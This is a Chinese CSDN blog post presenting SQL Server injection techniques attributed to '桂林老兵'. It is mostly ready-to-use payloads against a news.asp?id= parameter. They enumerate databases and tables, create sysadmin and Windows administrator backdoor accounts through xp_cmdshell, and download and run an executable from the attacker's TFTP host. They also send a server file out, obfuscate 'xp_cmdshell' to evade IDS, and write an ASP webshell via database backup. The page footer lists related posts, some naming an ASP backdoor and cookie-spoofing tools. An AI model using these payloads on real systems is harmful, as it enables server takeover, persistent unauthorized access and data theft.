桂林老兵的SQLSERVER高级注入技巧

最新推荐文章于 2023-01-04 09:17:40 发布
最新推荐文章于 2023-01-04 09:17:40 发布
阅读量1k 收藏 1
点赞数
分类专栏: 黑客技术 文章标签: sqlserver 数据库 database file object image
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrub/article/details/215314
版权
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:


前言:
即是高级技巧,其它基本的注入方法就不详述了。
看不懂可查本站的注入基础文章。
为了更好的用好注入,建议大家看看本站的SQL语法相关文章


[获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库


[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and status>0 and name not in('table')


[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]


通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]


news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将系统用户test提升为管理员


这样,你在他的数据库和系统内都留下了test管理员账号了


下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器,将69端口打开]


id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--


然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell 'file.exe';--


下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:


id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--


绕过IDS的检测[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/'


新加的:

建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk='d:/web/db.asp';


报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@VERSION);
scrub
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
桂林老兵cookie欺骗工具
10-11
经典的cookie欺骗工具
SQL Server 中“dbo”到底是什么
热门推荐
sinolover的专栏
09-26 3万+
在SQL Server中看见很多表名都有前缀dbo,但是不写也可以。比如pubs的数据库中的表dbo.title 1. dbo是一个构架(schema),在sql2005中,表的调用格式如下:"数据库名.构架名.表名",同一个用户可以被授权访问多个构架,也可以被禁止访问某个或多个构架,这就是2005中提倡的"用户与构架分离"的概念.在2005中,如果在创建表时没有指定构架(schema),那么系...
(分享)SQLSERVER高级应用
weixin_30907935的博客
09-15 344
最近正在努力钻研SQLSERVER高级应用,最主要的有存储过程和游标等。下面是好心的网友给我的一些资料,下面我贴出来一起分享。 1. Sql Server2005基础 1.1 Sql server 2005简介 1.2 Sql Server2005创建<删除>数据库 1.2.1 用工具创建<删除>数据库 1.2.2...
SQL server高级函数查询
SunnyDayyy的博客
05-24 570
高级函数的作用: 数据统计函数查询 数据分组查询 汇总数据 多表查询 数据统计函数 数据函数的具体作用 -- 聚合函数 ------------count() 计算次数--------------------------- --计算订单的数目,并且取中文别名 select count(*) as '订单总数' from orders; --查看布鲁士的订单数目 select count(*) as '布鲁士的订单数' from orders where customer='布鲁士'; -
Sqlserver高级操作
weixin_34194317的博客
05-12 158
列出某数据库下的所有表 SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' 或者 SELECT OBJECT_NAME (id) FROM sysobjects WHERE xtype = 'U' AND OBJECTPROPERTY (id, 'IsMSShipped') = 0 ...
SQLServer 对象创建注意事项之dbo
www_xue_xi的博客
11-30 890
最近,一客户遇到一个奇怪的问题,sqlserver数据库,使用备份恢复到目标机器。之后,在目标服务器创建了测试函数对象,但是执行查询的时候却提示对象不存在,再次尝试创建该函数及其依赖的对象时提示要创建的对象已存在。
Cookies浏览器 桂林老兵
09-08
Cookies浏览器 桂林老兵版 cookie查看,cookie修改
桂林老兵ASP站长助手6.0
04-05
桂林老兵ASP站长助手6.0 一个小巧的asp后门,功能包括: 文件管理模板、文件浏览/下载/删除/编辑/复制/移动/新建/上传; 目录新建/移动/删除/复制; 数据库管理模板: ACCESS数据库建立/压缩/操作; 以及常见数据库...
桂林老兵网页上传工具
03-07
网页漏洞 桂林老兵写的万能上传工具 只所以叫万能上传是因为大名鼎鼎的动网都没有注意到这个严重漏洞,那么其他系统也基本上避免不了,所以称它为“万能上传”。
桂林老兵的 新WEBTOOL V4.2.rar
11-28
桂林老兵的 新WEBTOOL V4.2.rar
数据库管理助手 制作:桂林老兵
11-30
可用于连接Access文件、微软SQL数据库、MySQL数据库,以及数据源。
桂林老兵工具Webtools
04-14
桂林老兵网站安全检测工具WebTool V3.0 网站安全检测工具V3.0 2005-10-9更新,新开窗口浏览得到了改进。
桂林老兵的WebTool3.7
01-08
桂林老兵的WebTool3.7 3.7版本 加入多线程网站路径扫描功能
桂林老兵的网站安全检测浏览器
03-17
桂林老兵的网站安全检测浏览器桂林老兵的网站安全检测浏览器桂林老兵的网站安全检测浏览器桂林老兵的网站安全检测浏览器
桂林老兵cookie欺骗
07-02
1.可对自己开发的网站进行cookie欺骗模拟测试 2.可对要测试的网站进行欺骗
SQL Server之dbo
李晓娜
05-25 4998
背景   当我们在执行sql查询语句的时候会自动给表名加上这么一样标识,如图: 那么为什么会加上dbo呢?什么是dbo呢?    dbo简介   Ø  定义   dbo (dbo----database owner)是具有在数据库中执行所有活动的暗示性权限的用户。将固定服务器角色 sysadmin的任何成员都映射到每个数据库内称为 dbo 的一个特殊用户上。另外,由固定服务器
SQLServer注入技巧
weixin_34356310的博客
06-22 429
一、对于SA权限的用户执行命令,如何获取更快捷的获取结果? 有显示位 无显示位 其实这里的关键并不是有无显示位。exec master..xp_cmdshell 'systeminfo'生成的数据写进一张表的时候,会产生很多行。而我们要做的就是如何很多行通过显示位、或者报错语句一次性爆出来,这里的关键就是多行合一。 方法①BEGIN IFEXI...
SQLServer中的 dbo
Alone_in_的博客
11-06 3218
感觉说的都很有道理,随笔记录下来。 说法一: 数据库所有者 (dbo) dbo 是具有在数据库中执行所有活动的暗示性权限的用户。将固定服务器角色 sysadmin 的任何成员都映射到每个数据库内称为 dbo 的一个特殊用户上。另外,由固定服务器角色 sysadmin 的任何成员创建的任何对象都自动属于 dbo。 例如,如果用户 Andrew 是固定服务器角色 sysadmin 的成员,...
SQL Server手工注入方式
yy
01-04 5160
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
失地农民综合管理平台实现项目管理、人员管理、缴费核定、待遇管理、统计分析、优抚安置、老兵家园七大核心功能对吗
最新发布
06-11
根据描述,失地农民综合管理平台实现了项目管理、人员管理、缴费核定、待遇管理、统计分析、优抚安置、老兵家园七大核心功能,是正确的。 具体来说,失地农民综合管理平台是针对失地农民群体的一种管理平台,主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值